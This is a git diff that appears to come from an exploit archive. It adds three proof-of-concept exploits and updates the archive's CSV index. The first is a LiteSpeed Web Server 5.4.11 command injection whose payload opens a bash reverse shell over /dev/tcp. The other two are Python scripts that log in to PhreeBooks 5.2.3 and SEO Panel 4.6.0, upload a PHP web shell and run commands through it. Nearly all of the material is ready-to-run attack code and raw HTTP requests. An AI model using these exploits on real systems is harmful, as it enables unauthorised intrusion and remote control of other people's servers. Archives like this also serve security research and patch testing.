diff --git a/exploits/php/webapps/49523.txt b/exploits/php/webapps/49523.txt
new file mode 100644
index 000000000..98935ebbf
--- /dev/null
+++ b/exploits/php/webapps/49523.txt
@@ -0,0 +1,36 @@
+# Exploit Title: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)
+# Date: 05/20/2021
+# Exploit Author: cmOs - SunCSR
+# Vendor Homepage: https://www.litespeedtech.com/
+# Software Link: https://www.litespeedtech.com/products
+# Version: 5.4.11
+# Ubuntu/Kali Linux
+
+
+Step 1: Log in to the dashboard using the Administrator account.
+Step 2 : Access Server Configuration > Server > External App > Edit
+Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
+Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
+Step 5: Graceful Restart
+
+[POC]
+
+POST /config/confMgr.php HTTP/1.1
+Host: 192.168.1.6:7080
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
+Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
+;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+https://192.168.1.6:7080/config/confMgr.php?m=serv&p=ext&t=A_EXT_FCGI&r=file&a=E&tk=0.59220300%201612516386
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 505
+Origin: https://192.168.1.6:7080
+Connection: close
+Cookie: LSWSWEBUI=85fa7ba9b37d18d57e41e092a2a2a61f;
+lsws_uid=j%2FsI8GRiKBc%3D; lsws_pass=c7pC2izvdbQ%3D
+Upgrade-Insecure-Requests: 1
+
+name=file&address=127.0.0.1%3A5434¬e=&maxConns=2000&env=&initTimeout=1&retryTimeout=1&persistConn=1&pcKeepAliveTimeout=20&respBuffer=0&autoStart=1&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.1.6%2F1234+0%3E%261%27&backlog=&instances=&extUser=root&extGroup=root&umask=&runOnStartUp=3&extMaxIdleTime=&priority=&memSoftLimit=&memHardLimit=&procSoftLimit=&procHardLimit=&a=s&m=serv&p=ext&t=A_EXT_FCGI&r=file&tk=0.59220300+1612516386&file_create=
\ No newline at end of file
diff --git a/exploits/php/webapps/49524.py b/exploits/php/webapps/49524.py
new file mode 100755
index 000000000..5cc702283
--- /dev/null
+++ b/exploits/php/webapps/49524.py
@@ -0,0 +1,187 @@
+# Exploit Title: PhreeBooks 5.2.3 - Remote Code Execution
+# Date: 22 Jan 2021
+# Exploit Author: Kr0ff
+# Vendor Homepage: https://www.phreesoft.com/
+# Software Link: https://sourceforge.net/projects/phreebooks/
+# Version: 5.2.3
+# Tested on: Windows Server 2016
+
+#!/usr/bin/env python3
+
+'''
+DESCRIPTION:
+ - PhreeBooks ERP 5.2.3 is vulnerable to remote code execution
+ due to authenticated unrestricted file upload in the "Image Manager"
+ section of the application.
+
+VULNERABLE VERSION:
+ - ver 5.2.3
+
+AUTHOR:
+ - Kr0ff
+
+Note: This is a rewrite of exploit: https://www.exploit-db.com/exploits/46645
+
+Web shell used as payload: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
+'''
+#https://asciiart.website/index.php?art=animals/
+
+try:
+ import requests
+ import argparse
+ import sys
+ import re
+ import random
+ from termcolor import colored
+ from time import sleep
+except ImportError as e:
+ print(colored("[ERROR]: ", "red"), f"{e}")
+
+def ascii_art():
+ example_usage = "python3 exploit.py -t http://10.10.10.120/phreebooks -u admin@phreebooks.com -p admin"
+ art = '''
+
+ \ /
+ \ o ^ o /
+ \ ( ) /
+ ____________(%%%%%%%)____________
+ ( / / )%%%%%%%( \ \ )
+ (___/___/__/ \__\___\___)
+ ( / /(%%%%%%%)\ \ )
+ (__/___/ (%%%%%%%) \___\__)
+ /( )\\
+ / (%%%%%) \\
+ (%%%)
+ !
+
+ | _ \ |_ _ _ ___ ___| |__ ___ ___| |__ ___
+ | _/ ' \| '_/ -_) -_) '_ \/ _ \/ _ \ / /(_-<
+ |_| |_||_|_| \___\___|_.__/\___/\___/_\_\/__/
+ ___ ___ ___ ___ ___ ___
+ | __| _ \ _ \ | _ \/ __| __|
+ | _|| / _/ | / (__| _|
+ |___|_|_\_| |_|_\\___|___| v5.2.3
+==============================================
+'''
+ print(art)
+ print(example_usage)
+ print("\r\n==============================================\r\n")
+
+def exploit(TARGET, USER, PASS):
+ '''
+ PHP Reverse Shell
+ '''
+ web_shell = """
+
+
+
+
+
+
+
+
+
+"""
+
+ '''
+ Perform the login and grab cookies of user
+ '''
+ error_msg = "The information you entered cannot be validated, please retry."
+ url = f"{TARGET}/index.php?&p=bizuno/portal/login"
+ headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": f"{TARGET}/index.php?p=", "Content-Type": "multipart/form-data; boundary=---------------------------211698600840544395022617560470", "Connection": "close"}
+ login_data=f"-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name=\"UserID\"\r\n\r\n{USER}\r\n-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name=\"UserPW\"\r\n\r\n{PASS}\r\n-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name=\"UserLang\"\r\n\r\nen_US\r\n-----------------------------211698600840544395022617560470--\r\n"
+
+ print(colored("[*]","blue"), f"Logging in using account: \"{USER}\"")
+ r = requests.post(url, headers=headers, data=login_data, verify=False)
+
+ if error_msg in r.text:
+ print(colored("[-]","red"), f"Couldn't log in using account: \"{USER}\"...")
+ print("Something could be wrong, check everything and try again...")
+ sys.exit(1)
+ print(colored("[+]","green"), f"Logged in with account: \"{USER}\"")
+ else:
+ print(colored("[+]","green"), f"Logged in with account: \"{USER}\"")
+
+ try:
+ print(colored("[*]","blue"), f"Grabbing cookies...")
+ get_all_cookies = r.headers['Set-Cookie']
+ get_needed_cookies = re.split(r'\s', get_all_cookies)[6].replace(';','').replace('bizunoSession=','').strip()
+ user_cookie = re.split(r'\s', get_all_cookies)[13].replace(';','').replace('bizunoUser=','').strip()
+ except IndexError:
+ print(colored("[-]","red"), f"Couldn't grab cookies...")
+ print("Something could be wrong, check everything and try again...")
+ sys.exit(1)
+
+ '''
+ Continue with the exploitation part of the exploit
+ Uploading a file with random name and .php extension,
+ since "Image Manager" doesn't restrict file types
+ '''
+
+ f_name = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php"
+ print(colored("[*]","blue"), f"Trying to upload file \"{f_name}\"")
+
+ e_url = f"{TARGET}/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload"
+ e_cookies = {"bizunoLang": "en_US", "bizunoUser": f"{user_cookie}", "bizunoSession": f"{get_needed_cookies}"}
+ e_headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": f"{TARGET}/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------211698600840544395022617560470", "Connection": "close"}
+ e_data= f'-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name="imgSearch"\r\n\r\n\r\n-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name="imgFile"; filename="{f_name}"\r\nContent-Type: binary/octet-stream\r\n\r\n{web_shell}\n\r\n-----------------------------211698600840544395022617560470--\r\n'
+
+ u_req = requests.post(e_url, headers=e_headers, cookies=e_cookies, data=e_data, verify=False)
+ if u_req.status_code == 200:
+ print(colored("[+]","green"), f"Uploaded file: \"{f_name}\"")
+ else:
+ print(colored("[-]","red"), f"Couldn't upload file: \"{f_name}\"")
+ print("Something could be wrong, check everything and try again...")
+ sys.exit(1)
+
+ '''
+ Perform the execution of the PHP reverse shell
+ by accessing the path to it
+ '''
+ sreq = requests.get(f"{TARGET}/myFiles/images/{f_name}")
+ if sreq.status_code == 200:
+ print(colored("[+]", "green"), f"Webshell is uploaded to: {TARGET}/myFiles/images/{f_name}")
+ elif sreq.status_code == 404:
+ print(colored("[-]", "red"), f"Webshell was not uploaded !\r\nCheck your target...")
+ print("Check if the upload file path is correct in the exploit and in the web application...")
+ sys.exit(0)
+ else:
+ print(colored("[!]", "yellow"), f"Something could be wrong, check everything and try again...\r\n")
+ sys.exit(1)
+
+'''
+Initilize parser for arguments
+'''
+def parse_argz():
+ parser = argparse.ArgumentParser(description='PhreeBooks 5.2.3 Remote Code Execution via Authenticated File Upload ')
+ parser.add_argument("-t", "--target", help="Target http/s:[IP/HOSTNAME]/phreebooks", type=str, required=True)
+ parser.add_argument("-u", "--user", help="Email to login as", type=str, required=True)
+ parser.add_argument("-p", "--passwd", help="Password to authenticate with", type=str, required=True)
+ #args = parser.parse_args(args=None if sys.argv[1:] else ['--help']) #Show help menu if no arguments provided
+ args = parser.parse_args(args=None)
+
+ if len(sys.argv) == 1:
+ parser.print_help()
+ sys.exit(1)
+
+ TARGET = str(args.target)
+ USER = str(args.user)
+ PASS = str(args.passwd)
+
+ exploit(TARGET, USER, PASS)
+
+if __name__ == "__main__":
+ try:
+ ascii_art()
+ parse_argz()
+ except Exception as e:
+ print(colored("[ERROR]","red"), f"-> {e}")
+ sys.exit(1)
\ No newline at end of file
diff --git a/exploits/php/webapps/49525.py b/exploits/php/webapps/49525.py
new file mode 100755
index 000000000..694b4cc85
--- /dev/null
+++ b/exploits/php/webapps/49525.py
@@ -0,0 +1,134 @@
+# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution (2)
+# Date: 22 Jan 2021
+# Exploit Author: Kr0ff
+# Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/
+# Software Link: https://www.seopanel.org/spdownload/4.6.0
+# Version: 4.6.0
+# Tested on: Ubuntu 20.04
+
+#!/usr/bin/env python3
+
+'''
+DESCRIPTION:
+ - SeoPanel 4.6.0 vulnerable to Remote Code Execution via authenticated file upload
+
+FIXED:
+ - ver 4.7.0
+
+AUTHOR:
+ - Kr0ff
+'''
+#https://asciiart.website/index.php?art=animals/bats
+
+try:
+ import requests
+ import argparse
+ import sys
+ from termcolor import colored
+ from time import sleep
+except ImportError as e:
+ print(colored("[ERROR]: ", "red"), f"{e}")
+
+def arty():
+ artz = """
+ HAPPY HALLOWEEN !
+ ....._
+ `. ``-. .-----.._
+ `, `-. .: /`
+ : `".. ..-`` :
+ / ...--:::`n n.`::... :
+ `:`` .` :: / `. ``---..:.
+ `\ .` ._: .-: :: `. .-``
+ : : :_\\_/: : .:: `. /
+ : / \-../:/_.`-` \ :
+ :: _.._ q` p ` /` \|
+ :-` ``(_. ..-----hh``````/-._:
+ `: `` / `
+ E: /
+ : _/
+ : _..-``
+ l--``
+----------------------------------------------------------
+ _
+ ___ ___ ___ ___ __ ___ ___| |___ ___ ___
+|_ -| -_| . | . ||. | | -_| | _| _| -_|
+|___|___|___| _|___|_|_|___|_|_| |___|___|
+ |_| 4.6.0
+
+@Kr0ff
+----------------------------------------------------------
+"""
+ print(artz)
+
+#Initialize requests to create a session
+r = requests.session()
+
+#Create a login for the user
+def login(TARGET, USER, PASS):
+ data = {"sec":"login", "red_referer": f"{TARGET}", "userName": f"{USER}", "password": f"{PASS}","login":""}
+ headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+ req = r.post(f"{TARGET}/login.php", headers=headers, data=data, verify=False)
+ if req.status_code == 200:
+ print(colored("[SUCCESS]", "green"), f"Status code for login.php -> {req.status_code}\r\n")
+ else:
+ print(colored("[FAILURE]", "red"), f"Status code for login.php -> {req.status_code}\r\n")
+ print("Please check if you are providing the right path to 'seopanel' or if server is live...")
+ get_ch = req.headers.get("Set-Cookie")
+ return get_ch
+
+#Upload the webshell to target server
+def exploit(TARGET, USER, PASS):
+ login(TARGET, USER, PASS)
+ headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": TARGET + "/admin-panel.php", "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+ payload = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"bc1ab68651691302e1434959b70cba26.php\"\r\nContent-Type: text/csv\r\n\r\n\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n"
+ req0 = r.post(f"{TARGET}/websites.php", headers=headers, data=payload, verify=False)
+ if req0.status_code == 200:
+ print(colored("[SUCCESS]", "green"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n")
+ else:
+ print(colored("[FAILURE]", "red"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n")
+ print("Please check if you are providing the right path or if server is live...")
+
+ while(1):
+ try:
+ p = input("$> ")
+ shell_url = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx={p}"
+ control = r.get(shell_url, headers=headers, verify=False)
+ if control.status_code == 200:
+ print(colored("[SUCCESS]","green"), "Shell uploaded successfully !\r\n\r\n")
+ print(control.text)
+ else:
+ print(colored("[ERROR]","red"), "Shell not uploaded... :(")
+ print("Status code ->", colored(control.status_code, "red"))
+ sys.exit(0)
+ except KeyboardInterrupt: #Do self-cleanup on ctrl+c and wait a sec
+ cleanup = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx=rm bc1ab68651691302e1434959b70cba26.php"
+ requests.get(cleanup, headers=headers, verify=False)
+ sleep(1)
+ print(colored("\r\n[ERROR]", "red"), "Exitting ! Self-cleanup done !")
+ break
+
+#Initilize parser for arguments
+def parse_argz():
+ parser = argparse.ArgumentParser(description='SEO Panel 4.6.0 authenticated RCE via file upload')
+ parser.add_argument("-t", "--target", help="Target http/s:[IP/HOSTNAME]/seopanel/", type=str)
+ parser.add_argument("-u", "--user", help="Username to login as", type=str)
+ parser.add_argument("-p", "--passwd", help="Password to authenticate with", type=str)
+ #args = parser.parse_args(args=None if sys.argv[1:] else ['--help']) #Show help menu if no arguments provided
+ args = parser.parse_args(args=None)
+
+ if not args.target or not args.user or not args.passwd:
+ parser.error(colored("[WARNING]","yellow"), "Not all arguments provided")
+ sys.exit(1)
+ else:
+ TARGET = str(args.target)
+ USER = str(args.user)
+ PASS = str(args.passwd)
+ exploit(TARGET, USER, PASS)
+
+if __name__ == "__main__":
+ try:
+ arty()
+ parse_argz()
+ except Exception as e:
+ print(colored("[ERROR]","red"), f"-> {e}")
+ sys.exit(1)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7ca8055c2..5fe9b8827 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18158,7 +18158,7 @@ id,file,description,date,author,type,platform,port
46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)",2019-03-28,Metasploit,remote,php,80
46628,exploits/multiple/remote/46628.rb,"Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)",2019-03-28,Metasploit,remote,multiple,
46641,exploits/php/remote/46641.rb,"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)",2019-04-03,AkkuS,remote,php,80
-46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution",2019-04-03,"Metin Yunus Kandemir",remote,python,80
+46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution (1)",2019-04-03,"Metin Yunus Kandemir",remote,python,80
46654,exploits/multiple/remote/46654.html,"Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion",2019-04-03,"Google Security Research",remote,multiple,
46655,exploits/hardware/remote/46655.rb,"Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)",2019-04-03,Metasploit,remote,hardware,
46662,exploits/php/remote/46662.rb,"WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)",2019-04-05,Metasploit,remote,php,80
@@ -40809,7 +40809,7 @@ id,file,description,date,author,type,platform,port
48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware,
48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json,
48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
-48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution",2020-10-08,"Kiko Andreu",webapps,php,
+48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution (1)",2020-10-08,"Kiko Andreu",webapps,php,
48863,exploits/hardware/webapps/48863.txt,"D-Link DSR-250N 3.12 - Denial of Service (PoC)",2020-10-08,"RedTeam Pentesting GmbH",webapps,hardware,
48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
@@ -43714,3 +43714,6 @@ id,file,description,date,author,type,platform,port
49513,exploits/php/webapps/49513.txt,"Student Record System 4.0 - 'cid' SQL Injection",2021-02-02,"Jannick Tiger",webapps,php,
49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,
49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,
+49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,
+49524,exploits/php/webapps/49524.py,"PhreeBooks 5.2.3 ERP - Remote Code Execution (2)",2021-02-05,Kr0ff,webapps,php,
+49525,exploits/php/webapps/49525.py,"SEO Panel 4.6.0 - Remote Code Execution (2)",2021-02-05,Kr0ff,webapps,php,